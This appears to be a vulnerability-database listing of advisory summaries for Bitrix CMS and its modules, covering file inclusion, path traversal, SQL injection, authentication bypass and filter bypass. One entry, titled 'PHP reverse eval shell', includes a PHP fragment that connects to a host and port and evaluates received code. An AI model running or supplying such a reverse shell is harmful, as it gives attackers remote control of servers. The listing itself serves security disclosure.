bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion

Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Versions: 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 without technical details Vendor Notification: November 18, 2015 Vendor Patch: November 25, 2015...

bitrix.scan Bitrix 1.0.3 Path Traversal Vulnerability

bitrix.mpbuilder Bitrix module version 1.0.10 suffers from a local file inclusion vulnerability. Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Versions: 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 without technical details...

bitrix.mpbuilder Bitrix Module PHP File Inclusion Vulnerability

A PHP file inclusion vulnerability exists in the bitrix.mpbuilder Bitrix module. Because the "work" HTTP POST parameter is not properly filtered before the "/bitrix/admin/bitrix.mpbuilderstep2.php" script is used by the include PHP function, a remote attacker can include and execute arbitrary loc...

bitrix.xscan Bitrix Module Path Traversal Vulnerability

A path traversal vulnerability exists in the bitrix.xscan Bitrix module. Due to the lack of directory traversal character filtering e.g., ". /". A remotely authenticated attacker can upload a file with malicious content by passing this file through a vulnerable script in a renamed filename...

PHP File Inclusion in bitrix.mpbuilder Bitrix Module

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain...

Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module

High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website...

Path Traversal via CSRF in bitrix.xscan Bitrix Module

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.xscan Bitrix module, intended to discover and neutralize malware on the website. The vulnerability can be exploited to change extension of arbitrary PHP files on the target system and gain access to potentially sensitive...

SQL Injection in orion.extfeedbackform Bitrix Module

High-Tech Bridge Security Research Lab discovered two vulnerabilities in orion.extfeedbackform Bitrix module, can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website. All discover...

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

PT-2014-10: Proactive Filter Bypassing in Bitrix CMS

The specialists of the Positive Research center have detected a Proactive Filter Bypassing vulnerability in Bitrix CMS. Bitrix Proactive Filter, which provides traffic filtering and protection from attacks on web application, ignores the entire functionality of MySQL queries syntax due to imprope...

Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/33689/info Bitrix Site Manager is prone to multiple input-validation vulnerabilities: - An authentication-bypass vulnerability - A cross-site scripting vulnerability An attacker may leverage these issues to gain...

CVE-2013-6788

The Bitrix e-Store module before 14.0.1 for Bitrix Site Manager uses sequential values for the BITRIXSMSALEUID cookie, which makes it easier for remote attackers to guess the cookie value and bypass authentication via a brute force attack...

Authentication flaw

The Bitrix e-Store module before 14.0.1 for Bitrix Site Manager uses sequential values for the BITRIXSMSALEUID cookie, which makes it easier for remote attackers to guess the cookie value and bypass authentication via a brute force attack...

CVE-2013-6788

CVE-2013-6788 affects Bitrix Site Manager’s Bitrix e-Store module prior to 14.0.1. The vulnerability stems from sequential BITRIX_SM_SALE_UID cookie values, enabling remote unauthenticated attackers to guess cookie values by brute force and bypass authentication to view or manipulate another user...

CVE-2013-6788

The Bitrix e-Store module before 14.0.1 for Bitrix Site Manager uses sequential values for the BITRIXSMSALEUID cookie, which makes it easier for remote attackers to guess the cookie value and bypass authentication via a brute force attack...

User Identity Spoofing in Bitrix Site Manager

Advisory ID: HTB23183 Product: Bitrix Site Manager Vendor: Bitrix, Inc Vulnerable Versions: 12.5.13 and probably prior Tested Version: 12.5.13 Advisory Publication: November 6, 2013 without technical details Vendor Notification: November 6, 2013 Vendor Patch: November 12, 2013 Public Disclosure:...

Bitrix Site Manager用户身份欺骗漏洞

CVECAN ID: CVE-2013-6788 Bitrix Site Manager是一款web站点管理工具。 Bitrix Site Manager中的预购电子存储模块显示时，没能充分核查数据的真实性，远程未经认证的用户可以更改“BITRIXSMSALEUID”的cookie，浏览其他用户的购物信息和执行某些操作，如添加或删除购物车中的物品。 0 Bitrix Site Manager=12.5.13 厂商补丁： Bitrix ----- 升级"sale"模块到14.0.1版本，请到厂商的主页下载：...

Bitrix Site Manager 12.5.13 Insufficient Verification

Advisory ID: HTB23183 Product: Bitrix Site Manager Vendor: Bitrix, Inc Vulnerable Versions: 12.5.13 and probably prior Tested Version: 12.5.13 Advisory Publication: November 6, 2013 without technical details Vendor Notification: November 6, 2013 Vendor Patch: November 12, 2013 Public Disclosure:...

User Identity Spoofing in Bitrix Site Manager

High-Tech Bridge Security Research Lab discovered vulnerability in Bitrix Site Manager, which can be exploited to spoof user's identity and read, modify or delete pre-ordered items in customer's basket. 1 User Identity Spoofing in Bitrix Site Manager: CVE-2013-6788 The vulnerability exists due to...

PT-2013-64: Access Control Bypassing in Bitrix CMS

The specialists of the Positive Research center have detected an Access Control Bypassing vulnerability in Bitrix CMS. This vulnerability has been discovered in the integrity check mechanism of the "Script Integrity Monitor", which allows an attacker to forge the integrity check mechanism and...